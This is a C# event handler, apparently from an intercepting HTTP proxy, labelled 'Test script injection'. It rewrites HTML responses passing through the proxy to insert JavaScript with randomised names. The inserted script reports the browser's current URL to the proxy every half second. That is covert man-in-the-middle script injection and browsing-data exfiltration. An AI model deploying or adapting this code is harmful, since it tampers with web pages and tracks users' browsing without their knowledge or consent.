//Test script injection
//Insert script to read the Browser URL and send it back to proxy
public void OnResponse(object sender, SessionEventArgs e)
{
try
{
if (e.ProxyRequest.Method == "GET" || e.ProxyRequest.Method == "POST")
{
if (e.ServerResponse.StatusCode == HttpStatusCode.OK)
{
if (e.ServerResponse.ContentType.Trim().ToLower().Contains("text/html"))
{
string c = e.ServerResponse.GetResponseHeader("X-Requested-With");
if (e.ServerResponse.GetResponseHeader("X-Requested-With") == "")
{
e.GetResponseBody();
string functioname = "fr" + RandomString(10);
string VisitedURL = RandomString(5);
string RequestVariable = "c" + RandomString(5);
string RandomURLEnding = RandomString(25);
string RandomLastRequest = RandomString(10);
string LocalRequest;
if (e.IsSecure)
LocalRequest = "https://" + e.Hostname + "/" + RandomURLEnding;
else
LocalRequest = "http://" + e.Hostname + "/" + RandomURLEnding;
string script = "var " + RandomLastRequest + " = null;" +
"if(window.top==self) { " + "\n" +
" " + functioname + "();" +
"setInterval(" + functioname + ",500); " + "\n" + "}" +
"function " + functioname + "(){ " + "\n" +
"var " + RequestVariable + " = new XMLHttpRequest(); " + "\n" +
"var " + VisitedURL + " = null;" + "\n" +
"if(window.top.location.href!=null) " + "\n" +
"" + VisitedURL + " = window.top.location.href; else " + "\n" +
"" + VisitedURL + " = document.referrer; " +
"if(" + RandomLastRequest + "!= " + VisitedURL + ") {" +
RequestVariable + ".open(\"POST\",\"" + LocalRequest + "\", true); " + "\n" +
RequestVariable + ".send(" + VisitedURL + ");} " + RandomLastRequest + " = " + VisitedURL + "}";
string response = e.ResponseString;
Regex RE = new Regex("</body>", RegexOptions.RightToLeft | RegexOptions.IgnoreCase | RegexOptions.Multiline);
string replaced = RE.Replace(response, "<script type =\"text/javascript\">" + script + "</script></body>", 1);
if (replaced.Length != response.Length)
{
e.ResponseString = replaced;
_URLList.Add(RandomURLEnding);
}
}
}
}
}
}
catch { }
}